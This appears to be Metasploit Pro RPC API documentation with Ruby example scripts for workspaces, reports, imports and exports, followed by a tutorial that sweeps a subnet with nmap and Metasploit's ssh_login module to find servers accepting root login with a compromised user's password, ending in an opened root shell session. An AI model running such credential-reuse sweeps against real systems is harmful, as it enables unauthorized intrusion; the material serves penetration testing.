Sample Usage of the RPC API

The following scripts provide examples of how to use the RPC API to perform common tasks. They can be found in `metasploit/apps/pro/api-example`. Each script takes the API token as its first command-line argument and, for brevity, connects with ssl: false. On anything other than a local development instance enable TLS, and prefer handing the token over through an environment variable or a file rather than argv, which other users on the host can read from the process list and which also lands in shell history.
Adding a Workspace

```ruby
#
# NOTE: workspaces and projects are the same thing.
#
require_relative 'metasploit_rpc_client'

workspace_attrs = {
  name: "Foocorp's Finest",
  limit_to_network: true,
  boundary: "10.2.3.1-10.2.3.24",
  description: "A test of Foocorp's mission-critical internal seismic LAN."
}

# Set from the CLI: ARGV[0] is the API token, ARGV[1] the Pro instance address.
api_token = ARGV[0]
host = ARGV[1]

# Make the client. ssl: false is only acceptable against a local development
# instance; set ssl: true in an installed environment, otherwise the token
# travels in plaintext on every call.
client = MetasploitRPCClient.new(host: host, token: api_token, ssl: false, port: 50505)

client.call('pro.workspace_add', workspace_attrs)
```
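The scripts on this page call into metasploit_rpc_client, which they require but which is not shown here. The following is an added example, not the page's code and not Metasploit's own client: it shows what a call such as client.call('pro.workspace_add', workspace_attrs) puts on the wire and how a client should protect the token in transit. It assumes (check against your copy of metasploit_rpc_client.rb) that the Pro RPC service speaks MessagePack over HTTP(S), that requests are POSTed to /api/1.0 with Content-Type binary/message-pack, and that each request body is the packed array [method, token, *args]. The names MiniMsgpack and ProRpcRequest are mine; MiniMsgpack implements only the encoder subset these arguments need, so no gem is required.

```ruby
# Added example: MessagePack framing of a Metasploit Pro RPC call plus a request
# builder that refuses to leak the token over plaintext. Path, content type and
# frame layout are assumptions to verify against metasploit_rpc_client.rb.
require 'net/http'
require 'openssl'

module MiniMsgpack
  # Encodes nil, booleans, Integers, Strings, Symbols (as strings), Arrays and Hashes.
  def self.pack(obj)
    case obj
    when nil     then [0xC0].pack('C')
    when true    then [0xC3].pack('C')
    when false   then [0xC2].pack('C')
    when Integer then pack_int(obj)
    when Symbol  then pack_str(obj.to_s)
    when String  then pack_str(obj)
    when Array
      head = obj.size < 16 ? [0x90 | obj.size].pack('C') : [0xDC, obj.size].pack('Cn')
      obj.inject(head) { |buf, e| buf << pack(e) }
    when Hash
      head = obj.size < 16 ? [0x80 | obj.size].pack('C') : [0xDE, obj.size].pack('Cn')
      obj.inject(head) { |buf, (k, v)| buf << pack(k) << pack(v) }
    else raise ArgumentError, "unsupported type #{obj.class}"
    end
  end

  def self.pack_int(n)
    return [n].pack('C')         if n.between?(0, 127)        # positive fixint
    return [n].pack('c')         if n.between?(-32, -1)       # negative fixint
    return [0xCC, n].pack('CC')  if n.between?(0, 0xFF)       # uint 8
    return [0xCD, n].pack('Cn')  if n.between?(0, 0xFFFF)     # uint 16
    return [0xCE, n].pack('CN')  if n.between?(0, 0xFFFFFFFF) # uint 32
    return [0xD0, n].pack('Cc')  if n.between?(-128, -1)      # int 8
    return [0xD1, n].pack('Cs>') if n.between?(-32_768, -1)   # int 16
    return [0xD2, n].pack('Cl>') if n.between?(-2**31, -1)    # int 32
    raise ArgumentError, "integer out of range: #{n}"
  end

  def self.pack_str(s)
    b = s.b
    head = if b.bytesize < 32     then [0xA0 | b.bytesize].pack('C') # fixstr
           elsif b.bytesize < 256 then [0xD9, b.bytesize].pack('CC') # str 8
           else                        [0xDA, b.bytesize].pack('Cn') # str 16
           end
    head << b
  end
end

class ProRpcRequest
  # Assumed defaults: /api/1.0 endpoint, port 50505 as in the page's scripts.
  def initialize(host:, token:, ssl: true, port: 50505, path: '/api/1.0', ca_file: nil, allow_plaintext: false)
    @host, @port, @ssl, @path, @token = host, port, ssl, path, token
    @ca_file, @allow_plaintext = ca_file, allow_plaintext
  end

  # The token is the second positional element of every frame. It is a bearer
  # credential: anyone who can read the request body can replay the call.
  def frame(method, *args)
    [method, @token, *args]
  end

  def build(method, *args)
    req = Net::HTTP::Post.new(@path)
    req['Content-Type'] = 'binary/message-pack'
    req.body = MiniMsgpack.pack(frame(method, *args))
    req
  end

  # Refuses to send the token in plaintext unless explicitly allowed, and verifies
  # the server certificate. For a self-signed instance certificate, pin it with
  # ca_file instead of dropping to VERIFY_NONE.
  def post(method, *args)
    raise 'refusing to send the API token over plaintext HTTP' if !@ssl && !@allow_plaintext
    http = Net::HTTP.new(@host, @port)
    http.use_ssl = @ssl
    http.verify_mode = OpenSSL::SSL::VERIFY_PEER
    http.ca_file = @ca_file if @ca_file
    http.request(build(method, *args))
  end
end
```

Decoding the response is left out; in practice the msgpack gem handles both directions. The point of the framing is that every call on this page, not just the login, carries the token, which is why the TLS setting on the client is not a convenience flag.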
Listing, Downloading, and Generating Reports

```ruby
# Example of report listing, download, and generation via the RPC API.
#
# Usage:
#   ruby report_api_test.rb <ServiceKey> <MSProInstance> '<WorkspaceName>'
#
# ServiceKey:    API token generated from Global Settings; requires a
#                Pro-licensed instance.
# MSProInstance: 127.0.0.1 if running locally.
#

require_relative 'metasploit_rpc_client'

# Set from the CLI
api_token = ARGV[0]
host = ARGV[1]
workspace_name = ARGV[2]

# Make the client (ssl: false only for a local development instance)
client = MetasploitRPCClient.new(host: host, token: api_token, ssl: false, port: 50505)

## Reports
# List report types
type_list = client.call('pro.list_report_types')
puts "Allowed report types:\n#{type_list}"

# List current reports
#report_list = client.call('pro.report_list', workspace_name)
#puts "\n\nExisting reports: #{report_list}\n"

# Download a report artifact. The response carries the file bytes in 'data' and
# the server-side name in 'file_path'; only its extension is reused locally.
#report_artifact_id = 1
#artifact = client.call('pro.report_artifact_download', report_artifact_id)
#tmp_path = "/tmp/report_#{report_artifact_id}#{File.extname(artifact['file_path'])}"
#File.open(tmp_path, 'wb') { |f| f.write artifact['data'] }
#puts "Wrote report artifact #{report_artifact_id} to #{tmp_path}"

# Create a report
#report_hash = {
#  workspace: workspace_name,
#  name: "SuperTest_#{Time.now.to_i}",
#  report_type: :audit,
#  se_campaign_id: 1,
#  created_by: 'whoareyou',
#  file_formats: [:pdf]
#}
#report_creation = client.call('pro.start_report', report_hash)
#puts "\n\nCreated report:\n#{report_creation}"

## Download a report and its child artifacts
#report_id = 1
#report = client.call('pro.report_download', report_id)
#report['report_artifacts'].each_with_index do |a, i|
#  tmp_path = "/tmp/report_test_#{i}_#{Time.now.to_i}#{File.extname(a['file_path'])}"
#  File.open(tmp_path, 'wb') { |f| f.write a['data'] }
#  puts "Wrote report artifact #{report_id} to #{tmp_path}"
#end
```
Importing Data

```ruby
#
# Example of data import via the RPC API.
#
# Usage:
#   ruby import_api_test.rb <ServiceKey> <MSProInstance> \
#     '<ProjectName>' \
#     '<full path of import file>'
#
# ServiceKey:     API token generated from Global Settings; requires a
#                 Pro-licensed instance.
# MSProInstance:  127.0.0.1, if running locally.
# ProjectName:    Name of the existing workspace to import into.
# ImportFilePath: Fully-qualified path of a file in a supported import
#                 format. Only the path is sent; the Pro instance opens the
#                 file, so it must exist on the server, not on the machine
#                 running this script.
#
require_relative 'metasploit_rpc_client'

# CLI arguments
api_token = ARGV[0]
host = ARGV[1]
workspace_name = ARGV[2]
import_file_path = ARGV[3]

unless api_token && host && workspace_name
  raise ArgumentError, 'You must specify an API token, an instance address, and a workspace name.'
end
unless import_file_path
  raise ArgumentError, 'You must specify an import file path.'
end

# Make the client (ssl: false only for a local development instance)
client = MetasploitRPCClient.new(host: host, token: api_token, ssl: false, port: 50505)

# Import configuration
import_hash = {
  workspace: workspace_name,
  # Toggle datastore options (documented, with some exceptions such as
  # this handy one) here:
  #ds_autotag_os: true,
  # TODO: update with the correct path:
  DS_PATH: import_file_path
}

import = client.call('pro.start_import', import_hash)
puts "\nStarted import:\n#{import}"
```
Exporting Data

```ruby
# Example of export listing, download, and generation via the
# RPC API.
#
# Usage:
#   ruby export_api_test.rb <ServiceKey> <MSProInstance> '<WorkspaceName>'
#
# ServiceKey:    API token generated from Global Settings; requires a
#                Pro-licensed instance.
# MSProInstance: 127.0.0.1 if running locally.
#

require_relative 'metasploit_rpc_client'

# Set from the CLI
api_token = ARGV[0]
host = ARGV[1]
workspace_name = ARGV[2]

# Make the client (ssl: false only for a local development instance)
client = MetasploitRPCClient.new(host: host, token: api_token, ssl: false, port: 50505)

### Exports
## List current exports
export_list = client.call('pro.export_list', workspace_name)
puts "Existing exports: #{export_list}"

## Create an export
#export_types = ['zip_workspace', 'xml', 'replay_scripts', 'pwdump']
#export_config = {
#  created_by: 'whoareyou',
#  export_type: export_types[0],
#  workspace: workspace_name
#}
#export_creation = client.call('pro.start_export', export_config)
#puts "Created export: #{export_creation}"

## Download an export. pwdump and zip_workspace exports include the workspace's
## credentials, so treat the downloaded file as sensitive.
#export_id = 1
#export = client.call('pro.export_download', export_id)
#tmp_path = "/tmp/export_test_#{export_id}#{File.extname(export['file_path'])}"
#File.open(tmp_path, 'wb') { |f| f.write export['data'] }
#puts "Wrote export #{export_id} to #{tmp_path}"
```
Tutorial

Objective: find Linux servers that allow me to log in as root with a known credential.

Let's set up the test scenario. By one means or another I have obtained the clear-text password of a single user, Bob. I have Bob's Windows credentials and can easily access his machine via RDP or PsExec. I have determined that Bob is a Linux administrator. I want to find out which Linux servers, if any, allow me to log in as 'root' with Bob's compromised password. There are many ways to do this; below is one of them.
```shell
nmap 10.0.1.1/24 -p22 -oG ssh_scan.gnmap
```
The file ssh_scan.gnmap contains our live hosts and the state of port 22 on each. We need to trim the result file down to only those hosts where SSH is "open". The following command does just that and saves the target IPs to a separate file:
```shell
cat ssh_scan.gnmap | grep open | cut -d " " -f 2 > ssh_hosts.txt
```
We now have a file named ssh_hosts.txt containing the list of IP addresses running SSH. Next, let's start Metasploit and the MSGRPC interface:
```text
msfconsole
msf exploit(handler) > load msgrpc Pass=pa55w0rd
[*] MSGRPC Service:  127.0.0.1:55552
[*] MSGRPC Username: msf
[*] MSGRPC Password: pa55w0rd
[*] Successfully loaded plugin: msgrpc
msf exploit(handler) >
```
At this point Metasploit's RPC interface is listening on port 55552, and we can write the Python script that automates testing SSH logins. Before proceeding, I highly recommend reviewing Metasploit's Remote API documentation. The following pseudocode covers what we need:

- Authenticate to Metasploit's MSGRPC interface (username: msf, password: pa55w0rd).
- Create a Metasploit console.
- For each Linux host in the file, run the ssh_login module with Bob's compromised password, 's3cr3t'.
- Destroy the Metasploit console (clean up to save resources).
- Interact with any established SSH sessions.
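The pseudocode above, written out as an added example. The page's own implementation is a Python script that is referenced below but not reproduced on this page; this Ruby version is not that script and is not Metasploit code. It uses the real MSGRPC method names (auth.login, console.create, console.write, console.read, console.destroy, session.list) and the msfconsole commands the tutorial relies on, but runs against FakeMsgrpc, a constructed in-memory stand-in that answers the way msfconsole's msgrpc plugin does for those calls, so it executes offline. The host list and the credential the fake target accepts are constructed test data. To run it live, replace FakeMsgrpc with a transport that packs each call as MessagePack and POSTs it to 127.0.0.1:55552.

```ruby
# Added example (not the page's Python script, not Metasploit code). FakeMsgrpc is a
# constructed stand-in for msfconsole's msgrpc plugin; SshLoginSweep is the tutorial's
# five steps expressed over the real MSGRPC method names.
class FakeMsgrpc
  attr_reader :commands, :consoles

  # users: MSGRPC accounts. creds: the root credentials each constructed "target" accepts.
  def initialize(users:, creds:)
    @users, @creds = users, creds
    @commands, @consoles, @sessions = [], {}, {}
  end

  # Every call after auth.login carries the session token as its first argument.
  def call(method, *args)
    return login(*args) if method == 'auth.login'
    token, *rest = args
    return { 'error' => true, 'error_message' => 'Invalid Authentication Token' } unless token == 'TEMPTOKEN'
    case method
    when 'console.create'
      id = @consoles.size.to_s
      @consoles[id] = { ds: {}, out: +'', busy: false }
      { 'id' => id, 'prompt' => 'msf > ', 'busy' => false }
    when 'console.write' then write(@consoles.fetch(rest[0]), rest[1])
    when 'console.read'
      c = @consoles.fetch(rest[0])
      data, c[:out] = c[:out], +''
      busy, c[:busy] = c[:busy], false # a module run reports busy once, then idle
      { 'data' => data, 'prompt' => 'msf > ', 'busy' => busy }
    when 'console.destroy' then { 'result' => @consoles.delete(rest[0]) ? 'success' : 'failure' }
    when 'session.list' then @sessions
    end
  end

  def login(user, pass)
    return { 'error' => true, 'error_message' => 'Invalid User ID or Password' } unless @users[user] == pass
    { 'result' => 'success', 'token' => 'TEMPTOKEN' }
  end

  # Console input: "set KEY VALUE" updates the datastore; "run" attempts the SSH login.
  def write(console, line)
    @commands << line
    if line =~ /\Aset (\w+) (.+)\n\z/
      console[:ds][$1] = $2
    elsif line == "run\n"
      host, creds = console[:ds]['RHOSTS'], console[:ds].values_at('USERNAME', 'PASSWORD')
      if @creds[host] == creds
        @sessions[@sessions.size + 1] = { 'type' => 'shell', 'target_host' => host, 'info' => "SSH #{creds.join(':')} (#{host}:22)" }
        console[:out] << "[+] #{host}:22 - Success: '#{creds.join(':')}'\n"
      else
        console[:out] << "[-] #{host}:22 - Failed: '#{creds.join(':')}'\n"
      end
      console[:busy] = true
    end
    { 'wrote' => line.bytesize }
  end
end

class SshLoginSweep
  MODULE = 'auxiliary/scanner/ssh/ssh_login'

  def initialize(rpc, username:, password:)
    @rpc, @username, @password = rpc, username, password
  end

  # Step 1: authenticate; the temporary token then rides on every later call.
  def login(user, pass)
    res = @rpc.call('auth.login', user, pass)
    raise "auth failed: #{res['error_message']}" if res['error']
    @token = res['token']
  end

  # Steps 2-5: one console, one ssh_login run per host, destroy it, then list sessions.
  # Returns [sessions, console output]. Live input: File.readlines('ssh_hosts.txt', chomp: true).
  def sweep(hosts)
    console_id = rpc('console.create')['id']
    output = hosts.map do |host|
      ["use #{MODULE}", "set RHOSTS #{host}", "set USERNAME #{@username}",
       "set PASSWORD #{@password}", 'run'].each { |cmd| rpc('console.write', console_id, "#{cmd}\n") }
      drain(console_id)
    end
    rpc('console.destroy', console_id)
    [rpc('session.list'), output.join]
  end

  def rpc(method, *args)
    @rpc.call(method, @token, *args)
  end

  # Poll console.read until the module reports idle, collecting its output.
  def drain(console_id)
    out = +''
    loop do
      r = rpc('console.read', console_id)
      out << r['data'].to_s
      break unless r['busy']
      sleep 0.1
    end
    out
  end
end
```

The drain loop is the part that matters against a real server: console.write returns as soon as the input is queued, and the module's output only arrives through repeated console.read calls while busy is true. Note also that set PASSWORD sends Bob's password through the RPC channel, so that channel needs TLS protection, not only the MSGRPC login.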
Below is the complete Python source listing (please note that I am not a programmer). To proceed with the test, I updated the user settings at the top of the script to a username of 'root' and a password of 's3cr3t' (Bob's compromised password). Save the changes and run the Python script:

```text
./msfrpc_ssh_scan.py
[+] Authentication successful
[+] Console 0 created
[!] Testing host 10.0.1.43
[+] Listing sessions...
    Session ID    Target
    1             root@10.0.1.43
```
Looking at the session listing, the script successfully authenticated as 'root' on host 10.0.1.43 with Bob's password. The Metasploit console we started earlier confirms this:

```text
msf exploit(handler) >
[*] Command shell session 1 opened (10.0.2.10:43863 -> 10.0.1.43:22) ...
msf exploit(handler) > sessions

Active sessions
===============

  Id  Type         Information                      Connection
  --  ----         -----------                      ----------
  1   shell linux  SSH root:s3cr3t (10.0.1.43:22)   10.0.2.10:43863 -> 10.0.1.43:22 (10.0.1.43)
```